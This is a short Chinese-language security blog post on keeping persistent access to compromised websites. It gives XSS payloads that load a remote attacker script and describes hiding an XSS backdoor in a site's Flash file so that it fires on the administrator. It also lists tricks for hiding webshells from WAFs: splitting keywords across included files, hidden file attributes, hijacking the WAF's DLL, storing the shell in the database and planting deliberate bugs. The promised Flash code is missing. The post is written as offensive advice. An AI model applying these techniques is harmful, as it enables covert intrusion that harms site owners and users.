0x00 后门程序
后门包括从简单到奇特,有很多的类型。简单的后门可能只是建立一个新的账号,或者接管一个很少使用的账号;复杂的后门(包括木马)可能会绕过系统的 安全认证而对系统有安全存取权。例如一个login程序,当你输入特定的密码时,你就能以管理员的权限来存取系统。 --转载至百度百科
0x01 后门的使用及隐藏
一. XSS后门的使用及隐藏
XSS后门的简介:XSS后门大都是在程序在没有突破口时,进行盲打或拿下后台时,怕管理员改掉密码而无法进入所留下的后门。
XSS后门的编写:很多时候,我们都会使用XSS进行攻击。而且语句基本都是<script href=你的js地址'></script>、<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>这种情况,一般管理员都见怪不怪了。很轻易的就找到了我们的后门,并删除了。那。。。有什么更好的方式留下后门吗?答案是,当然。我们可以劫持网站上原本的FLASH来进行后门的植入。我们只需要在FLASH中加入以下语句。(请注意要讲原来的FLASH加载进去哦~)

当我们植入我们的XSS后门之后,网站管理员只要一打开就会上钩啦~当然,这种情况也是有弊端的!随着浏览器的安全性能越来越高,这种情况时不会被执行 的。(老一点的版本可以哦)那我们要怎么做呢?很简单,大家eval一句话应该都熟悉吧?JavaScript也存在eval这个函数呢!动动你们的脑 子!
二.shell的隐藏
一句话短小而又精湛,不容易被发现。但是,自从有了WAF,那是各种扫描啊!真tm不知道往哪里藏。下面就说下我自己藏shell的思路吧。
1.拆分关键字,采用多文件包含的方式隐藏。
2.设置文件属性为隐藏+系统文件。
3.劫持WAF的DLL进行死循环写出。(这事我最爱干)
4.将真正的一句话写入数据库。(过WAF妥妥的)
5.制造程序漏洞。(有编程功底的自己制造漏洞当后门啊!)
0x02 结束语
By:傀儡
本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Note/450.html